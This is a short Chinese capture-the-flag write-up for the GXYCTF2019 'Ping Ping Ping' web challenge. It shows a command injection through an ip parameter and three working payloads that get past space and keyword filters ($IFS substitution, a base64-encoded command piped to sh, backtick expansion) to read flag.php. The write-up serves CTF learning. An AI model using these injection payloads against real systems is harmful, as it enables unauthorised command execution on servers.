[GXYCTF2019]Ping Ping Ping

1.访问页面,提示传参为ip。
[GXYCTF2019]Ping Ping Ping_第1张图片
2.?ip=明显存在命令执行注入,使用 ; 或者 | 闭合上一条命令。

  • 经过fuzz测试,过滤了空格、bash字符、flag字符、以及一些特殊符号。
  • ?ip=;ls时,发现flag.php就在当前目录下。

[GXYCTF2019]Ping Ping Ping_第2张图片
3.构造POC,获取Flag。

方案一:
	;a=g;cat$IFS$1fla$a.php
方案二:
	;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
方案三:
	;cat$IFS$9`ls`

$flag = "flag{dee32435-d7bd-485a-8fed-f61ac98d81d3}";

[GXYCTF2019]Ping Ping Ping_第3张图片

你可能感兴趣的:(BUUCTF,web安全,安全,安全性测试,前端)